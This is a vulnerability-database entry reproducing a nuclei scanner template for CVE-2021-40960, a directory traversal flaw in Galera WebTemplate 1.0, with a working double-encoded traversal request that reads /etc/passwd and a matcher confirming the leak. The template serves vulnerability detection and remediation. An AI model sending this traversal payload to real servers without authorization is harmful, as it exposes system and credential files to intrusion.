Lucene search
K

Galera WebTemplate 1.0 Directory Traversal

šŸ—“ļøĀ 03 Jul 2026Ā 03:01:05Reported byĀ ProjectDiscoveryTypeĀ 
nuclei
Ā nuclei
šŸ”—Ā github.comšŸ‘Ā 32Ā Views

Galera WebTemplate 1.0 Directory Traversal CVE-2021-40960. Affected by directory traversal vulnerability disclosing /etc/passwd and /etc/shadow, leading to unauthorized access, data leakage, or system compromise. Apply vendor-provided updates to fix the vulnerability

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2021-40960
1 Oct 202114:15
–attackerkb
Circl
CVE-2021-40960
1 Oct 202118:15
–circl
CNNVD
Galera WebTemplate č·Æå¾„éåŽ†ę¼ę“ž
1 Oct 202100:00
–cnnvd
CVE
CVE-2021-40960
1 Oct 202113:12
–cve
Cvelist
CVE-2021-40960
1 Oct 202113:12
–cvelist
NVD
CVE-2021-40960
1 Oct 202114:15
–nvd
OpenVAS
Generic HTTP Directory Traversal / File Inclusion (Web Dirs) - Active Check
22 Jul 202100:00
–openvas
OSV
CVE-2021-40960
1 Oct 202114:15
–osv
Prion
Directory traversal
1 Oct 202114:15
–prion
id: CVE-2021-40960

info:
  name: Galera WebTemplate 1.0 Directory Traversal
  author: daffainfo
  severity: critical
  description: Galera WebTemplate 1.0 is affected by a directory traversal vulnerability that could reveal information from /etc/passwd and /etc/shadow.
  impact: |
    An attacker can read, modify, or delete sensitive files on the server, potentially leading to unauthorized access, data leakage, or system compromise.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in Galera WebTemplate 1.0.
  reference:
    - http://www.omrylmz.com/galera-webtemplate-1-0-directory-traversal-vulnerability-cve-2021-40960/
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40960
    - http://www.galera.com.tr/
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-40960
    cwe-id: CWE-22
    epss-score: 0.09768
    epss-percentile: 0.94951
    cpe: cpe:2.3:a:galera:galera_webtemplate:1.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: galera
    product: galera_webtemplate
  tags: cve2021,cve,lfi,galera,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/GallerySite/filesrc/fotoilan/388/middle//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a00463044022006326effb653a5555695ee562b9634a802747e3ee265379682cfa64ab9e85ea2022004591eecb1ac4706c86bc4020729b1878f174c8864ab73e47bab27fc86b1d821:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation withĀ Vulners data

WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data

Api

Power your application withĀ Vulners API

The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access

App

Assess and manage vulnerabilities withĀ VulnersĀ tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 27.5
CVSS 3.19.8
EPSS0.09768
32